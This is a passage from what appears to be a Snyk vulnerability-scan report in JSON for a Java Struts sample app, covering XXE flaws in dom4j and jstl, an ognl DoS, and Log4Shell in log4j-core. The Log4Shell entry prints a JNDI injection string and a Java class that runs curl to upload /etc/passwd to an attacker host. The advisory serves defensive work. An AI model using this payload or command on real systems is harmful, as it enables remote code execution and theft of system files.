Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of 
Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, 
- { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## 
Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - 
"id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "SNYK-JAVA-OGNL-30474", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Tao Wang" - ], - "semver": { - "vulnerable": [ - "[,3.0.12)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.0.12" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "ognl:ognl", - "references": [ - { - "url": "https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.218889Z" - }, - { - "type": "secondary", - 
"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "description": "## Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n", - "epssDetails": { - "percentile": "0.90602", - "probability": "0.02732", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3093" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "ognl:ognl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.659000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-02T02:16:48.918000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "ognl", - "artifactId": "ognl" - }, - "publicationTime": "2016-06-02T02:16:48.918000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:50.033229Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "ognl:ognl@3.0.6" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28", - "ognl:ognl@3.0.13" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "ognl:ognl", - "version": "3.0.6" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "credit": [ - "Chen Zhaojun of Alibaba Cloud Security Team" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.15.0" - ], - "patches": [], - "insights": { 
- "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 10, - "functions": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", - "className": "JndiLookup", - "functionName": "lookup" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", - "title": "Apache Jira Issues" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", - "title": "Apache Jira Issues" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/logging-log4j2/pull/608", - "title": "GitHub PR" - }, - { - "url": "https://github.com/Kirill89/log4shell-vulnerable-server", - "title": "PoC" - }, - { - "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", - "title": "Snyk Blog and Vulnerability Breakdown" - }, - { - "url": "https://www.exploit-db.com/exploits/51183", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:43.264835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. 
This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", - "epssDetails": { - "percentile": "0.99999", - "probability": "0.97556", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44228" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-jfh8-c2jp-5v3q" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-10T10:08:46.155884Z", - "functions_new": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.lookup.JndiLookup", - 
